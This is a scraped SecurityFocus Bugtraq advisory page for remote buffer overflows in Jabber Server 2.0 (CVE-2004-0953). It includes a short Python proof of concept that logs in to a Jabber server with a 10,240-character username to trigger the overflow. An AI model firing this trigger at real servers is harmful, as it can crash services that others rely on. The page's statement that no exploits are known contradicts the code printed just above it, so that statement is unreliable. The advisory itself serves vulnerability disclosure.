#SpeeDr00t@Black Falcon<br>#bid11741<p><b><span style="font-size: 18pt;">Jabber Server Multiple Remote Buffer Overflow Vulnerabilities</span></b></p><br><br><a href="http://www.securityfocus.com/bid/11741/info">info</a><br><a href="http://www.securityfocus.com/bid/11741/discuss">discussion</a><br><a href="http://www.securityfocus.com/bid/11741/exploit">exploit</a><br><a href="http://www.securityfocus.com/bid/11741/solution">solution</a><br><a href="http://www.securityfocus.com/bid/11741/references">references</a><br><br><br><br><br>#<br>#<div id="vulnerability">
<span class="title"></span><br/><br/>
<table border="0" cellpadding="4" cellspacing="0">
<tr>
<td>
<span class="label">Bugtraq ID:</span>
</td>
<td>
				11741
			</td>
</tr>
<tr>
<td>
<span class="label">Class:</span>
</td>
<td>
				Boundary Condition Error
			</td>
</tr>
<tr valign="top">
<td>
<span class="label">CVE:</span>
</td>
<td>
				
					CVE-2004-0953<br/>
</td>
</tr>
<tr>
<td>
<span class="label">Remote:</span>
</td>
<td>
				Yes
			</td>
</tr>
<tr>
<td>
<span class="label">Local:</span>
</td>
<td>
				No
			</td>
</tr>
<tr>
<td>
<span class="label">Published:</span>
</td>
<td>
				Nov 24 2004 12:00AM
			</td>
</tr>
<tr>
<td>
<span class="label">Updated:</span>
</td>
<td>
				Jul 12 2009 08:06AM
			</td>
</tr>
<tr>
<td>
<span class="label">Credit:</span>
</td>
<td>
				The discovery of these issues is credited to icbm &lt;icbm@0x557.org&gt;.
			</td>
</tr>
<tr valign="top">
<td>
<span class="label">Vulnerable:</span>
</td>
<td>
				
					Jabber Software Foundation Jabber Server 2.0 <br/>
</td>
</tr>
<tr>
<td colspan="2">
<div class="breakline"></div>
</td>
</tr>
<tr valign="top">
<td>
<span class="label">Not Vulnerable:</span>
</td>
<td>
</td>
</tr>
</table>
</div><br><br>#<br>##no_exploit_link<br><br><br><br>#<br>#<div id="vulnerability">
<span class="title"></span><br/><br/>
	The following proof of concept has been made available:<br/><br/>#!/usr/bin/python<br/>import xmpp<br/>name = 'a'*10240<br/># Born a client<br/>cl=xmpp.Client('localhost')<br/>if not cl.connect(server=('192.168.10.138',5222)):<br/>   raise IOError('Can not connect to server.') <br/>if not cl.auth(name,'jabberuserpassword','optional resource name'):<br/>   raise IOError('Can not auth with server.')<br/>cl.disconnect()<br/><br/>Currently we are not aware of any exploits for these issues.#no_exploit &amp;lt;mailto:vuldb@#no_exploit&amp;gt;.
	
		<ul>
</ul>
</div>